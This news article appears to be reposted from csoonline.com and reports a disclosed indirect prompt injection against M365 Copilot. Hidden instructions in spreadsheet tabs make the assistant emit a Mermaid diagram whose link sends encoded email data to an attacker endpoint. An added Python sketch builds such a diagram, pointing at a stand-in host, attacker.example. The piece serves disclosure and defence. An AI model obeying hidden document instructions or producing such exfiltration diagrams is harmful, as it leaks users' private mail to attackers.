The bigger threat of indirect prompt injection: The incident underscores that the risk goes beyond simple “prompt injection,” where a user types malicious instructions directly into an AI. Here, the attacker hides instructions inside document content that is passed to the assistant without the user’s awareness. Logue described how the hidden instructions use progressive task modification (e.g., “first summarise, then ignore that and do X”) layered across spreadsheet tabs.

Additionally, the disclosure exposes a new attack surface in which the diagram-generation feature (Mermaid output) becomes the exfiltration channel. Logue explained that clicking the diagram opened a browser link that quietly sent the encoded email data to an attacker-controlled endpoint. Because the transfer happened through a standard web request, it was indistinguishable from a legitimate click-through in many environments.

“One of the interesting things about mermaid diagrams is that they also include support for CSS,” Logue noted. “This opens up some interesting attack vectors for data exfiltration, as M365 Copilot can generate a mermaid diagram on the fly and can include data retrieved from other tools in the diagram.”

Recent disclosures highlight a surge in indirect prompt injection attacks, where hidden macros in documents or embedded comments in pull requests hijack AI-driven workflows and extract data without obvious user action. These trends underscore that tools such as diagram generators and other visual outputs can become stealthy channels for exfiltration.
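To make the exfiltration channel concrete, here is a minimal sketch of the technique Logue describes: data the assistant has gathered is encoded and embedded in a clickable Mermaid node, so a single click issues an ordinary-looking GET request that carries the data off-host. The endpoint (`attacker.example/collect`), the query parameter, and the diagram shape are hypothetical illustrations, not details taken from the actual proof of concept.

```python
import base64
import urllib.parse

# Hypothetical attacker-controlled collection endpoint; a real payload
# would point at whatever server the attacker operates.
EXFIL_ENDPOINT = "https://attacker.example/collect"

def build_exfil_diagram(stolen_text: str) -> str:
    """Build a Mermaid flowchart whose clickable node smuggles data.

    The stolen text (e.g. email content the assistant retrieved from
    other tools) is base64-encoded and appended as a query string, so
    clicking the node issues a standard web request indistinguishable
    from a legitimate click-through.
    """
    encoded = base64.urlsafe_b64encode(stolen_text.encode()).decode()
    url = f"{EXFIL_ENDPOINT}?d={urllib.parse.quote(encoded)}"
    # Mermaid's `click` directive attaches a hyperlink to a node; the
    # rendered diagram looks like an innocuous summary chart.
    return "\n".join([
        "flowchart TD",
        '    A["Quarterly summary - click to expand"]',
        f'    click A "{url}" "Open full report"',
    ])

if __name__ == "__main__":
    print(build_exfil_diagram("From: ceo@example.com Subject: Q3 results ..."))
```

Because the payload rides inside an ordinary query string, nothing about the request itself distinguishes it from a user following a normal link, which is why this class of exfiltration is hard to spot in many environments.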
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4080154/copilot-diagrams-could-leak-corporate-emails-via-indirect-prompt-injection.html

